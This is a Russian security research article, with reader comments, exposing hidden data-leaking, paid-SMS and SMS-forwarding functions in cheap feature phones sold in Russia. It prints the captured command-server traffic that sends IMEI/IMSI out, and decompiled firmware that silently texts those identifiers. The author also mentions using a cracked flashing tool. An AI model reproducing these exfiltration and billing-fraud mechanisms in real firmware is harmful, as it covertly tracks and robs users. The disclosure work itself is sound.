TL;DR: немалое количество простых кнопочных телефонов, присутствующих в российских магазинах, содержат нежелательные недокументированные функции. Они могут совершать автоматическую отправку СМС-сообщений или выходить в интернет для передачи факта покупки и использования телефона (передавая IMEI телефона и IMSI SIM-карт). Встречаются модели со встроенным трояном, отправляющим платные СМС-сообщения на короткие номера, текст которого загружается с сервера, также бывают устройства с настоящим бэкдором, пересылающим входящие СМС-сообщения на сервер злоумышленников.
Статья описывает детали вредоносных функций и способы их обнаружения.
Введение
Исследование мобильных телефонов началось с простой идеи: можно ли использовать эти дешевые и доступные в любом магазине трубки для приёма СМС-сообщений на компьютер? Телефоны гораздо дешевле распространённых USB GSM-модемов, к тому же большинство моделей поддерживают 2 SIM-карты, а некоторые и до четырёх.
В силу почти полного отсутствия информации о наличии и возможностях AT-порта в современных телефонах, я решил купить несколько максимально разных устройств для проверки их функциональности.
Но как выбрать по-настоящему разные телефоны?
Три кита мобильных SoC
Существует три основных производителя систем-на-чипе для кнопочных звонилок:
|
|
|
|
Архитектура |
MIPS |
ARM |
ARM |
Стандарты |
2G |
2G/3G/4G |
2G/3G/4G |
Более не выпускаются, но всё ещё продаются. |
Ребрендированы в Unisoc, но продолжают выпускать чипы под старым брендом. |
Имеют линейки для смартфонов, кнопочных телефонов, IoT, встраиваемых устройств, и т.д. |
Каждый производитель чипов предоставляет свой SDK для разработки прошивок на его основе. SDK разных производителей разительно отличаются и, как правило, пишутся под конкретную линейку чипов и задачу. Функции конечного устройства также зависят от операционной системы: SDK может быть интегрирован в ОС реального времени через HAL.
Не обязательно покупать десятки и сотни телефонов для проведения полноценного тестирования: достаточно купить несколько моделей разных производителей SoC и с разными операционными системами.
Что я купил и что получил
Были куплены почти случайные телефоны, ориентируясь по визуальной составляющей интерфейса на фотографиях и в видеообзорах и немногочисленной информации о SoC в интернете:
Inoi 101 (RDA8826/SC6533, 600₽)
DEXP SD2810 (SC6531E, 699₽)
Itel it2160 (MT6261, 799₽)
Irbis SF63 (SC6531DA, 750₽)
F+ Flip 3 (SC6531DA, 1499₽)
Довольно быстро я осознал, что с телефонами что-то не так…
Классификация нежелательных функций
Вредоносную активность телефонов можно разделить на три категории:
Отправка СМС и выход в интернет для «отслеживания продаж»
Наиболее безобидная функция, не наносящая значительный материальный урон мобильному счёту. Устройство без ведома пользователя отправляет СМС (на обычный российский номер) или выходит в интернет, передавая IMEI-номер телефона и IMSI SIM-карты неустановленной организации или частному лицу.
Передача данных осуществляется либо один раз до сброса устройства в заводское состояние, либо после каждого извлечения аккумулятора.Троян, отправляющий СМС на платные (короткие) номера, предварительно загрузив текст и номер с сервера через интернет
Функция, систематически списывающая средства со счёта мобильного номера. Помимо частого автоматического и скрытного выхода в интернет (что само по себе расходует деньги на не-пакетных тарифах), мобильное устройство отправляет отдельно тарифицируемые СМС-сообщения на короткие номера, перехватывает подтверждающую СМС и отправляет текст подтверждения в ответ.Бэкдор, перехватывающий входящие СМС-сообщения и отправляющий их на сервер
Позволяет злоумышленникам использовать ваш номер телефона для регистраций на сервисах, требующих подтверждения через СМС. Телефон периодически выходит в интернет и получает команды с сервера, результат выполнения которых отправляется обратно на сервер.
Методы обнаружения и анализа вредоносной активности
Проверка детализации мобильного оператора — способ, доступный любому человеку. Достаточно вставить рабочую SIM в телефон, включить его и оставить лежать полные сутки, после чего запросить детализацию в виде файла через онлайн-кабинет мобильного оператора. Данный метод позволяет выявить факт выхода в интернет (без адресов хостов и передаваемого содержимого), факт отправки СМС-сообщения и номер получателя, точное время совершенных действий.
Детализация помогает легко понять, содержится ли в телефоне нежелательная функциональность, без подробностей.
Анализ прошивки телефона — затратный метод, требующий глубоких познаний в устройстве телефона и способах обратной разработки ПО, зато позволяющий детально проанализировать вредоносные функции прошивки, а также избавиться от них.
Анализ прошивки состоит из трёх этапов:
Получение дампа из телефона или поиска и скачивания прошивки в интернете
Распаковки сжатых частей прошивки при необходимости
Исследования кода прошивки вручную
Самый простой и универсальный, но затратный или опасный способ дампа прошивки — использование так называемых «боксов» — аппаратно-программных комплексов от сторонних разработчиков для прошивки и восстановления широкого модельного ряда телефонов. Лет 15 назад боксы были распространены и востребованы, т.к. у каждого производителя телефонов был свой кабель, свой метод подключения к компьютеру в режиме сервисного обслуживания, часто требовалось подключение к контактным панелям (падам) в аккумуляторном отсеке. Современным телефонам такое, как правило, не нужно, и актуальные «боксы» представляют собой лишь особое ПО, способное производить все действия через USB-подключение.
Для снятия прошивки я воспользовался взломанной версией Miracle Box. Чтобы модификации, сделанные крякерами, нельзя было легко посмотреть путём сравнения оригинального и измененного файла, на взломанную версию навешан Enigma Protector, прямо поверх VMProtect, который используется в оригинальном ПО. Из-за этого программа запускается около минуты и тормозит на отрисовке кнопок и компонентов при переключении вкладок.
Взломщики не озаботились отключением интернет-функций программы, что позволило авторам выявлять использование взломанной версии и, по всей видимости, выполнять произвольный код на компьютере пользователя: в окне лога появляются устрашающие надписи о сборе и отправке всех сохранённых паролей на сервер.
Преимущество подобного ПО в полной автоматизации процесса: программа сама определит конкретную модель процессора, адрес флеш-памяти и её размер. Некоторые боксы содержат встроенные эксплоиты для обхода Secure Boot и других подобных защит.
Существуют и альтернативные варианты получения дампов. Для чипов Mediatek можно воспользоваться официальной программой MTK Flash Tool, в которой есть функция чтения произвольного адреса памяти, а для RDA можно воспользоваться готовым скриптом, позволяющим прочитать в т.ч. оперативную память.
Официальное ПО для Spreadtrum: SPD Flash Tool / ResearchDownload.
Для распаковки прошивки основного раздела ALICE чипов Mediatek можно воспользоваться сторонней разработкой unalice, разжимающий файл: https://github.com/donnm/mtk_fw_tools/
Про работу с прошивками RDA я уже писал в статье «Мелкая доработка прошивки кнопочного телефона на платформе RDA8826 (SC6533, MIPS): отключаем Funbox, взламываем игры». Самый простой способ — дать распаковать всё самому телефону, после чего извлечь распакованные данные из оперативной памяти прямо во время работы телефона.
На Spreadtrum основная часть прошивки сжата модифицированным LZMA, распаковщик к которому отсутствует в публичном доступе Уже доступен. Для распаковки необходимо модифицировать несжатый код таким образом, чтобы он выполнил распаковку аппаратным устройством и передал распакованный код на компьютер, но на моём единственном устройстве порт UART был настроен на DSP, а не основной процессор, и переключить мне его не удалось. Можно было задействовать другие методы вывода (например, воспользовавшись динамиком или фонариком в качестве транспорта), но я не стал этого делать.
Базовая станция 2G — удобный и лёгкий в настройке метод массового практического анализа вредоносной активности без предварительной подготовки каждого устройства, однако требующий значительных капитальных затрат на покупку SDR-оборудования.
Метод даёт доступ ко всему сетевому трафику GSM/GPRS, с возможностью его просмотра и модификации на лету.
Моя конфигурация:
bladeRF x115 ($650)
Raspberry Pi 400 ($100)
Открытое и бесплатное ПО базовой станции YateBTS
Wireshark для анализа GSM и интернет-трафика
BladeRF питается от USB и не требует никакой дополнительной обвязки. Достаточно обычной дипольной антенны для начала работы.
YateBTS автономно реализует все компоненты GSM-стека, благодаря чему устанавливается и настраивается буквально за 30 минут. Отлично подходит для подобных исследований!
Телефоны
Первое и самое «чистое» купленное устройство — Inoi 101, о котором я уже писал отдельную заметку
Этот телефон не содержит вредоносных функций. Присутствуют типичные нежелательные вещи вроде меню СМС-подписок и платные игры, но устройство не выполняет какие-либо действия самовольно или скрытно.
Itel — китайский производитель, выпускающий устройства для развивающихся стран. Входит в холдинг Transsion, объединяющий бренды Tecno, itel, Infinix, Spice.
Модель Itel it2160 сообщает «о продаже» через интернет, без предупреждения.
POST /SaleStatistics/sendsale/sendSale?ua=itel-it2160&screen=128X160&imsi=9250991625668426&imei=354648020000251&phone_version=it2160-DL194-EnRuUk-RU-20210201&platform=2&device=1&lang=Русский язык&timeStamp=2021-01-0102:00:00&auth=ed6bdd17212ec9c9699a6b0a693870fd HTTP/1.1
Host: asv.transsion.com:8080
Cache-Control: no-cache
Pragma: no-cache
Connection: Keep-Alive
x-wap-profile: http://nds.nokia.com/uaprof/N6280r100.xml
Content-Length: 0
HTTP/1.1 200 OK
Server: nginx/1.14.0 (Ubuntu)
Date: Mon, 31 May 2021 16:05:17 GMT
Content-Type: application/json;charset=UTF-8
Content-Length: 52
Connection: keep-alive
{"response":{"code":"201","desc":"Repeat Products"}}На домене asv.transsion.com была найдена панель, содержащая информацию о проданных устройствах, которую они сами присылают на сервер:
IMEI
Страна
Модель
Версия прошивки
Язык
Время активации
Идентификатор базовой станции (LAC/TAC)
Идентификатор базовой станции позволяет определить местоположение телефона с точностью до ≈5 километров.
Адрес панели: http://asv.transsion.com:8080/openinfo/open/index
Flip 3 российского OEM-поставщика F+ cообщает «о факте продажи» через СМС на номер +79584971255, отсылая IMEI и IMSI в теле сообщения.
Не содержит браузера, не выходит в интернет.
Декомпиляция прошивки выявляет наличие других номеров телефонов для ряда стран: +92313568243 для Пакистана (PLMN 410), +8804445600006 для Бангладеша (PLMN 470), 18049479956 для Азербайджана и Казахстана (PLMN 400, 401), +9156767215 для Индии (PLMN 404, 405).
_BYTE *__fastcall gmb_sms_sales_get_phone_number(int *plmn, int number_, int text_)
{
int text; // r2
char *number; // r1
MEMORY[0x10041098](number_, text_);
if ( plmn == (int *)410 )
{
text = text_;
number = "+92313568243";
}
else if ( (int)plmn > 410 )
{
if ( (int)plmn - 410 <= 50 || plmn != (int *)470 )
goto LABEL_17;
text = text_;
number = "+8804445600006";
}
else
{
if ( plmn == (int *)400 )
{
LABEL_17:
text = text_;
number = "18049479956";
return sub_10324500(number_, (unsigned __int8 *)number, text);
}
if ( (int)plmn > 400 )
{
if ( plmn == (int *)401 || plmn != (int *)404 && plmn != (int *)405 )
goto LABEL_17;
text = text_;
number = "+9156767215";
}
else
{
if ( plmn != (int *)250 )
goto LABEL_17;
text = text_;
number = "+79584971255";
}
}
return sub_10324500(number_, (unsigned __int8 *)number, text);
}В тексте СМС помимо IMEI и IMSI передаются три константы, по всей видимости означающие модель телефона и номер партии (дату производства):
…
sms_prepare_struct((int)v5, 32);
sub_10309198();
imsi = (const char *)get_imsi();
if ( !imsi )
imsi = &str_zero;
imei = (const char *)get_imei();
if ( !imei )
imei = "000000000000000";
strcpy((int)sms_str, "#%s#%s#%s#%d#%d#", imsi, imei, "250124", 64, 1);
result = schedule_sms((int)sms_str, (int)v5, v0, (int)sms_callback);Отзывы с Яндекс.Маркета:
После включения, аппарат отправил некое СМС на номер 9584971255. Скорее всего, верну аппарат обратно в магазин.
Подтверждаю. Телефон сам отправил смс на этот номер +79584971255. Списалось 2 рубля, сотовый оператор у меня МТС. В телефоне по умолчанию не сохраняются СМС, если это не настроить. Увидел списание в детализации счета. После сброса к заводским настройкам телефон опять отправил смс на этот номер, списалось ещё 2 рубля. Пришёл ответ от поддержки, что они о таком в первый раз слышат. Несмотря на то, что я указал о таком же случае у другого владельца, отправив их сюда прочитать отзыв. Они не захотели разбираться, предположив, что я сам случайно отправил смс или это отправилось смс предыдущего человека, который смотрел телефон.
На 4pda были обнаружены архивы прошивок от нескольких моделей фирмы BQ, которые очень похожи на прошивки F+. Судя по всему, это не перепакованный архив прошивки от OEM-производителя, содержащий помимо самой прошивки еще и файлы, необходимые для её отладки. В частности, в архивах содержится прошивка в виде .elf-файла, без сжатых секций, с отладочными символами.
Открыв .elf-файл в IDA, мы можем увидеть оригинальные названия функций и переменных.
Функция отправки СМС называется gmb_sms_sales_send_sms_ext, где gmb — вероятно, gmobi — поставщик сервиса смс-подписок.
Я попытался получить подробности об этой функциональности у производителя. С компанией F+ состоялся следующий диалог:
Кнопочный телефон F+ Flip 3 в автоматическом режиме и незаметно для пользователя отправляет СМС-сообщения на номер +79584971255 при установке в него российских SIM-карт, причём отправленное СМС-сообщение не сохраняется в памяти телефона. Сообщения содержат IMEI-номер устройства, IMSI-номер SIM-карты, и три фиксированных значения.
…
Полный формат сообщения следующий: #IMSI#IMEI#250124#64#1# Где IMSI — IMSI-номер SIM-карты, IMEI — IMEI-номер телефона.С какой целью данная функциональность внедрена в устройства F+?
>>> Нет информации.Почему о ней не заявляется на официальном сайте, коробке или инструкции устройства?
>>> Потому что этот функционал внедрён не нашими инженерами.Как обрабатываются полученные данные?
>>> Нет информации.Какому юридическому или физическому лицу принадлежит номер +79584971255?
>>> Нет информации.03.06.2021: Мы занимаемся решением данной проблемы. На новых ревизиях с новой прошивкой такой проблемы нет. Однако новая прошивка несовместима со старой ревизией телефонов. Как только в сервисе появится новая прошивка для старых ревизий я Вам сообщу.
15.06.2021: В сервисный центр поступила прошивка SW06 в которой решена эта проблема, обратитесь в ближайший сервисный центр из списка по ссылке https://fplusmobile.ru/support/ для перепрошивки Вашего телефона.
На просьбу выложить обновлённую версию прошивки в открытый доступ получил отказ и игнорирование дальнейших вопросов.
От BQ, прошивки которых я проанализировал и нашел подобную функциональность (отправка СМС на +79629511090), получил только совет обратиться в сервисный центр, с игнорированием дальнейших вопросов.
DEXP SD2810 от российского бренда сети магазинов DNS.
Опасный телефон, расходующий деньги мобильного счёта.
• Не содержит браузера, но подключается к GPRS
• Сообщает «о продаже» через интернет, без предупреждения
• Передаёт IMEI, IMSI
• Обращается к CnC в интернете и выполняет его команды
• Отправляет платные СМС на короткие номера с текстом, полученным с сервера
Телефон периодически отправляет POST-запросы по незашифрованному HTTP-соединению на домен www.mgs123.com, выполняет ответы сервера на отправку СМС-сообщений.
POST http://www.mgs123.com:8080/fee/mergserv HTTP/1.1
Host: www.mgs123.com
Accept: */*
User-Agent: MOT-E398/0E.20.34R MIB/2.2.1 Profile/MIDP-2.0 Configuration/CLDC-1.0 UP.Link/5.1.2.6
Content-Length: 177
BCMD=GetFeeConfig&CRTY=6&IMSI=250991625668426&RIMSI=250991625668426&CTYPE=1&CVER=2001&NONCE=151927053004&PLMN=25099&PMOD=8411&PNUM=&RTYPE=A&SIGN=7295DD12B0B11CF997AC8B4A593D82FA
<?xml version="1.0"?>
<smtinfo>
<BCMD>GetFeeConfig</BCMD>
<FNUM>4169</FNUM>
<CREP>2</CREP>
<INTV>6000</INTV>
<FMON>-1</FMON>
<CTAG>1</CTAG>
<INFO>null</INFO>
<FAUTO>0</FAUTO>
<FMONEY>50.0RUB</FMONEY>
<KCON>Оплата услуги на 4169%7C88001000633</KCON>
<FTAG>sms</FTAG>
<GRABSMS>2</GRABSMS>
<FMAX>0</FMAX>
<CCON>Отправьте 2 в ответ на данное</CCON>
<BSCO>1</BSCO>
<FPRICE>50.0</FPRICE>
<FNXT>45</FNXT>
<FSHD>1</FSHD>
<FINT>171</FINT>
<ISTWO>0</ISTWO>
<DATE>20210815</DATE>
<FFOC>1</FFOC>
<FCON>gooo mgs</FCON>
</smtinfo>Сервер сообщает, на какой номер отправить СМС (директива FNUM, номер 4169), содержание или префикс сообщения (директива FCON, сообщение gooo mgs), а также, помимо всего прочего, ожидаемый ответный текст (CCON, "Отправьте 2 в ответ на данное") и текст ответной СМС (GRABSMS, "2").
Домен www.mgs123.com зарегистрирован в Китае, хостинг тоже находится в этой стране:
$ whois mgs123.com | grep Registrar
Registrar WHOIS Server: grs-whois.hichina.com
Registrar URL: http://whois.aliyun.com
Registrar Registration Expiration Date: 2024-08-01T08:22:22Z
Registrar: Alibaba Cloud Computing (Beijing) Co., Ltd.
Registrar IANA ID: 420
Registrar Abuse Contact Email: DomainAbuse@service.aliyun.com
Registrar Abuse Contact Phone: +86.95187
$ dig +short www.mgs123.com
121.201.57.203
$ whois 121.201.57.203 | grep descr
descr: Guangdong RuiJiang Science and Tech Ltd.
descr: Room 404 ,No.100, Lingnan Avenue North,
descr: Lingnan Building, Foshan, GuangDong,
descr: CNC Group CHINA169 Guangdong Province Network
descr: Addresses from CNNIC(HUANDAO)
Выдержка из новости "Новокузнечанин купил телефон со встроенной «функцией разорения счёта»":
02.01.2019, мы приобрели телефон Dexp SD2810 [...] в день покупки мы вставили сим-карты и спустя 2 часа со счёта произошло списание денежных в размере 50 рублей. По детализации я увидел, что была отправка смс на номер 4446 и заказан какой-то развлекательный контент [...]
15.01.2019 и 02.02.2019 также были отправлены смс на этот же номер 4446 и списано по 50 р. за каждую.
DEXP не ответил на запрос о вредоносной функциональности.
Модель SF63 от российского OEM-поставщика Irbis.
Опасный телефон, использующий номер вашего телефона в коммерческих целях, для регистрации сторонних лиц в интернет-сервисах.
• Не содержит браузера, но подключается к GPRS
• Сообщает «о продаже» через интернет, без предупреждения
• Передаёт зашифрованные данные на сервер
• Обращается к CnC в интернете и выполняет его команды
Этот «бабушкофон» шёл из магазина с «чистой», обновлённой прошивкой. В интернете для этой модели была найдена одна единственная версия "IRBIS_SF63_GC9106_CTC_V05_GSM_FM_20181010.pac", которая и была установлена на устройство. Она оказалась с бекдором.
Телефон, как и в случае с DEXP, отправляет POST-запросы по HTTP, но эта модель шифрует передаваемые данные собственным алгоритмом с, по всей видимости, фиксированным ключом — шифрованные параметры большую часть времени одинаковы, а если меняются, то незначительно.
Данные передаются на домен hwwap.well2266.com.
GET /checkupdate?p=hxB4ZvBrVc9Hl8wcdORsVcZHmHetYc9sSHwEhuvtWc5Hkf0EYcF0SHGolxF4VEdrXcFsWERwWEhzW8RxSHGoifF4VudsXclvVc9rVuBzVuBySI6NhgZ4WEduVdZHlxV4WuFrVulrVc9sVc9HiHOvYc9HlxwuYc9HmxOrYc9HlHeIYfONk7iwlyWFYcRHjgitYc9HmPsEYc9HhHZ4Vc5oVc5oVE5sX75sWcJsWcJtVB%3D%3D HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Host: hwwap.well2266.com:8077
Connection: Keep-Alive
Cache-Control: no-cache
User-Agent: MAUI WAP Browser
Accept-Charset: utf8,gb2312
HTTP/1.1 200
Server: nginx/1.12.0
Date: Sat, 19 Jun 2021 15:11:06 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 28
Connection: keep-alive
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Cache-Control: must-revalidate
hfWvjgiGiQa2VE5tVbvrWDvsXgv=Домен зарегистрирован и хостится в Китае, в облаке Alibaba.
$ whois well2266.com | grep Registrar
Registrar WHOIS Server: grs-whois.hichina.com
Registrar URL: http://whois.aliyun.com
Registrar Registration Expiration Date: 2023-06-17T02:47:49Z
Registrar: Alibaba Cloud Computing (Beijing) Co., Ltd.
Registrar IANA ID: 420
Registrar Abuse Contact Email: DomainAbuse@service.aliyun.com
Registrar Abuse Contact Phone: +86.95187
$ dig +short hwwap.well2266.com
47.88.242.46
$ whois 47.88.242.46 | grep Organization
Organization: Alibaba.com LLC (AL-3)Выдержка из заметки "Бабушкофон ворующий смс и телеграм-аккаунты"
Началось все 24 октября 2020 года. [...] телефон радостно прислал мне уведомление, что новый контакт зарегистрировался в телеграм. Сон как рукой сняло ибо в телеграме зарегистрировалась бабушка моей девушки.
Выдержка из заметки "Как получить доступ к смс любого номера или Билайн пробивает дно"
Сегодня приходит сообщение в телеграмме, что моя бабушка теперь в Telegram!
Я сильно удивился, ведь бабушке уже больше 80 лет, телефон кнопочный, без доступа в интернет.
Позвонил ей, уточнил, говорит, что недавно приходил смс-код от номера Telegram.
Результаты
4 из 5 телефонов содержат незадекларированную функциональность, из них:
• 2 модели расходуют деньги со счёта (отправляют данные после покупки через СМС/интернет);
• 1 модель выходит в интернет и отправляет платные СМС-сообщения на короткие номера;
• 1 модель пересылает входящие сообщения через интернет.
Кто виноват?
Прежде всего виноват бренд, под которым продаются телефоны. Бренд заказывает разработку самого устройства и прошивки для него у OEM-производителя, но не проверяет конечное устройство на наличие незадекларированных возможностей. По какой-то причине, многие бренды не выкладывают прошивку на сайт, а отправляют обновлять устройство в сервисный центр в случае проблем.
Бренды F+ и BQ отрицают проблему или умалчивают о ней.
OEM-производитель готов внедрить любой каприз бренда или производителя сторонних модулей, за ваши же деньги.
Отсутствие в России специализированного министерства, которое бы занималось подобными проблемами. Минцифры (бывший Минсвязи) проверяют только сертификацию продукции на соответствие мировым и российским стандартам связи, но не функциональность конечного устройства.
Минцифры порекомендовало обращаться в Роспотребнадзор, перенеся проблему в плоскость продавец-покупатель.
Министерство цифрового развития, связи и массовых коммуникаций Российской Федерации [...] рассмотрело Ваше обращение о производителе оборудования ООО «Ф-Плюс Мобайл» и сообщает следующее.
Согласно Положению, Минцифры России осуществляет функции по выработке и реализации государственной политики и нормативно-правовому регулированию в сфере связи [...]
Информируем, что средства связи, указанные в Вашем первоначальном обращении, прошли процедуру обязательного подтверждения соответствия Правилам применения оборудования радиодоступа. [...]
Следует отметить, что в соответствии с Правилами при декларировании телефонных аппаратов для сетей подвижной радиотелефонной связи проверка наличия или отсутствия отправки коротких сообщений в автоматическом режиме не предусмотрена.
Федеральный государственный надзор в области защиты прав потребителей осуществляется уполномоченным федеральным органом исполнительной власти – Федеральной службой по надзору в сфере защиты прав потребителей и благополучия человека (Роспотребнадзор).
Что делать?
Мобильных телефонов огромное количество, проверить их все невозможно.
Покупайте только проверенные мировые бренды: телефоны Nokia не содержат вредоносной функциональности, но и стоят в 2-4 раза дороже «отечественных» аналогов;
Читайте отзывы перед покупкой: лучше купить проверенную модель, давно присутствующую на рынке, с безупречной репутацией, чем рисковать с новинками;
Отслеживайте поведение нового телефона после покупки в течение суток, по детализации оператора;
Пишите в Роспотребнадзор, ФСБ (?) и производителю, если обнаружили непонятную активность.
…а что с приёмом СМС?
Ни один из купленных телефонов не предоставляет полноценный AT-порт через USB или Bluetooth. Чтение SMS-сообщений с компьютера не реализовано нигде.
Обновления
@ILYA_ZX сделал распаковщик раздела STONE процессоров Spreadtrum.
Представитель DNS прокомментировал статью, запущена отзывная кампания моделей DEXP B281 и DEXP SD2810
Комментарии (363)
acc0unt
01.09.2021 00:03+17Очередная отличная статья!
Похоже, что адок дешёвых звонилок - поле воистину непаханное, и братья-китайцы уже давно нашли способы монетизировать бабушек с этими звонилками.
Подозреваю что в дешёвых китайских телефонах на Android можно найти такой же функционал - только прошивки эти расковыривать одновременно проще и сложнее. Проще потому что девайсы и софт более стандартные, сложнее потому что объём огромен.
ValdikSS Автор
01.09.2021 00:06+8Tecno, как и Itel входящий в холдинг Transsion, был замечен за распространением malware на смартфонах: https://www.bbc.com/news/technology-53903436
Устройства Tecno также продавались в российской рознице. Но вообще, вирусы на смартфонах — классика: https://habr.com/ru/post/418751/comments/#comment_18940873
acc0unt
01.09.2021 00:37+4Интересно, какова итоговая доля всей этой дряни во всяких "платная подписка подписалась сама".
Не умаляю заслуг операторов - само существование этих подписок в 2021 году ничем кроме способа "легального" отъёма денег у населения быть не может. Но скорее всего шума от бэкдоров и прочей дряни хватает чтобы спрятать в нём дичь с автоподписками.
ifap
01.09.2021 14:23-1Сложный вопрос, надо же определенную USSD-команду послать или SMS на определенный номер, чтобы подписаться. Какой интерес китайцам давать зарабатывать российским опсосам? Если только «локализованная» при участии местных заинтересованных лиц прошивка.
acc0unt
01.09.2021 19:44Это называется "партнёрка".
Партнёр оператора, который владеет сервисом подпиской, получает от оператора долю за каждую подписку. А партнёр партнёра, в свою очередь, подпихивает эту подписку людям, и за это тоже имеет долю.
На то, какими методами в этой цепочке получаются подписки, глаза принято закрывать.
ifap
01.09.2021 22:24+1Я знаю, как устрон этот
бизнесмошенническая схема, потому и сомневаюсь. Одно дело «вы сами в несознанке нажали» и поди докажи, что нет, другое — вот оно материальное доказательство, которое даже сбросом к заводским не уничтожишь. Да и слишком много сторон придется посвящать, куда проще и безопаснее самому оператору со своимипартнерамиподельниками подключать «услуги» — вся доказательная база под их контролем, если что — в детализации пусто, абонент бредит.
Arioch
02.09.2021 12:12вот оно материальное доказательство
Нет у вас никаких доказательств.
Вы должны доказать, что платная подписка появилась в следствие "[телефон] Обращается к CnC в интернете и выполняет его команды"
При появлении такого дела или CnC сервер вообще будет погашен для России, или этот телефон будет внесён в чёрный список на нём.
Запрос на сервер "меня продали!" - да отправляет. Подписываться - не подписывается. Нет такого в прошивке, а CnC ушёл в несознанку.
ifap
02.09.2021 12:49А что наведет владельца сервера на такую идею, полиция отправляет уведомление о плановой проверке в рамках расследования?
Arioch
02.09.2021 15:01Кстати, а почем бы и нет? Коррупцию никто не отменял, а "обычный участковый, тысячи их" такую экспертизу сам не сделает.
Но - до того, как дело дойдёт до суда, полиция должна будет связаться с магазином, представителем производителя и с оператором тоже. Предполагая, что любой из них может быть "в партнёрке", то до поступления дела в суд - утечка будет. А в суде скажут, что менты доказательства подделали.
ifap
02.09.2021 15:07А суд такой всплеснет руками: ах, подлые менты! Ну, раз вы так говорите, то дело прекращено!
Arioch
02.09.2021 19:02В хорошем суде - да.
А в плохом - доказательства вообще не нужны и предмета разговора нет.
Arioch
02.09.2021 20:03+1Это не важно. Если для вас хороший суд - это "нет оснований не доверять сотруднику милиции" - пусть так. Результат-то сходный будет: объективных доказательств злонамеренности телефона нет, потому что они просто никому не нужны, а нужны официальные показания милиционера под присягой, что "оно правда так, сам видел".
Arioch
02.09.2021 21:40это уже обратный солипсизм какой-то, что я вас выдумал.
я всё же пока буду надеяться, что:
вы всё же существуете объективно
в хороших судах требуются объективные доказательства, а не только
мнениясвидетельские показания полицейских
ifap
03.09.2021 00:22— Я объективно существую, что не мешает Вам успешно выдумывать мои реплики.
— В хороших судах — тех, которые аллегорически олицетворяет тетка с весами и повязкой на глазах — объективным будет считаться пласт доказательств, собранных в ходе ОРД, а необъективным — устное заявление обвиняемого: вывсеврети!
Arioch
03.09.2021 01:28доказательств, собранных в ходе ОРД
Довольно размытая формулировка. Понятно, если "в ходе ОРД" взяли телефон и положили в сейф - его можно в суде предъявить. Если удалось забрать сервер и положить в сейф - еще лучше. Но на это надежды мало.
Остаются по сути свидетельские показания. Я своей честью полицейского/нотариуса клянусь, что когда вон тот очкастый хакер нажимал кнопки, ой отправлял запрос на сервер, на экран выползало, ой, сервер возвращал....
После чего истец запрашивает экспертизу и экспертиза показывает, что ничего на самом деле сервер не возвращает.
3aBulon
04.09.2021 07:20Далеко не всегда. Чаще появляется всплывающее от оператора и одна кнопка ОК, она же подписаться. С плохим зрением очень реально сначала нажмут ОК а потом уже будет поздно.
ifap
04.09.2021 12:12Постойте, мы же говорим лишь о вредоносном коде в телефоне, а не всех существующих сравнительно честных способах отъема денег у граждан опсосами. То, о чем написали Вы — это пуш от оператора, телефону тут ничего делать и не надо.
hollycon
01.09.2021 07:55+1Товары с Али. Там даже и в телефоны\планшеты мировых брендов могут имплантировать нежелательное ПО нечистые на руку продаваны.
Сам удивлялся - а чего это у меня планшет через месяц после покупки наставил разного китайского ПО? После очередного сброса через месяц снова зоопарк. Вылечил прошивкой с 4pda, но это модель была популярная. Как быть с дешевым лютым китаем - неизвестно.
Полагаю, такое может быть и не только с Андроидом. Любая популярная платформа домашней электроники, камеры например давно уже таковые попадаются. Зачем искать в Сети IoT устройства и заражать их, если можно просто продавать весь этот ботнет?
Maximuzz
02.09.2021 19:39Однажды, купил серый (закупали на али ) телефон в локальном магазе, mi4c прошка была люто набита поапами со звуком, пока не перепрошил, телефон спокойно ночью не давал спать.
Popadanec
01.09.2021 12:43+2Встречал похожее в Fly и Tesla(уж не знаю, имеет ли отношение бренд к Илону Маску). Прошивка заводская, телефоны никогда не прошивались и не разблокировались загрузчики. Даже сторонние приложения не ставились. Через год или полтора после покупки с ними начиналась творится какая то дичь. Похоже срабатывал внутренний таймер и телефон начинал грузить кучу полноэкранной рекламы. Все установленные антивирусы находили кучу вирусов и удаляли их, кроме одного, который висел в прошивке и удалить его без рут прав было нельзя. Сброс, перепрошивка заводской не помогали, реклама начинала грузится почти сразу. Видимо привязана на дату.
Вопрос решился только установкой альтернативной прошивкой, а потом телефоны были заброшены на полочку ввиду малого размера ОЗУ и флеш памяти.
quwy
01.09.2021 17:13+1Самопроизвольная установка всякого шлака на китайфонах с андроидом уже давно в порядке вещей.
dartraiden
28.09.2021 01:51+1Подозреваю что в дешёвых китайских телефонах на Android можно найти такой же функционал
О… Был (и есть) такой производитель третьего эшелона — Doogee. Так вот вирусня в их прошивках (там натурально в SystemUI сидел троян, а ещё несколько маскировались под OTA-сервис и что-то ещё) достигла таких размахов, что сама Google пообещала им проблем, если не прекратят. После чего ВНЕЗАПНО вышли прошивки без вирусов.
Масштаб можно оценить, посмотрев спойлеры «Инструкции» и «Разное» в этом топике. Чтобы получить «чистую» прошивку, приходилось шить аж 4 разных патча, поскольку говнецо добавлялось и мигрировало из приложения в приложение с каждой новой версией прошивки.
Ну и Xiaomi. Количество данных, которые они сливают себе, зашкаливает.
Segneto
01.09.2021 00:11+13На сколько я знаю, в РФЯЦ ВНИИЭФ и подобных организациях, есть тема с запретом смартфонов, разрешены только кнопочные "звонилки", секретность и все такое. Возможно, скоро эти звонилки научат в тихую записывать звук и отсылать куда надо.
Akito7
01.09.2021 07:31+14Не только во ВНИИЭФ. В армии смартофоны запрещены отдельным указом президента. Вот и получается, что тот человек, который разрабатывал этот указ (или приказ МО) сделал большую глупость. Раньше военный знал, что его смартфон лучше никуда не брать т.к. он может выполнять множество мультимедийных функций. Сейчас военный кнопочный телефон берет куда угодно не думая про подобные закладки в ПО телефона, ведь у него есть список разрешенных телефонов.
kaimi_ru
01.09.2021 08:36+4Для структур есть отдельная категория устройств - http://stcnet.ru/products_iid_17.htm
Но насколько там все хорошо с прошивкой - неизвестно.
Lizardinius
02.09.2021 13:39Проходил «стажировку» в одном предприятии где у каждого второго допуск 1 или 2 категории. Там прямо после проходной стоят ячейки, куда можно телефоны складывать (как в супермаркетах только размером с пару смартфонов), и дальше этих ячеек ничего электронного проносить нельзя. Ну де юре нельзя, де факто — пока не поймают можно (а о проверочных рейдах заранее сообщается).
Так там люди берут звонилки не из-за секретности, а просто потому, что какая разница, что лежит в ячейке, да по вечерам и выходным позвонить иногда, а те, кто правилам не следует, полноценные лопаты с собой носят, главное чтобы из кармана не выпирал.
zhengxi
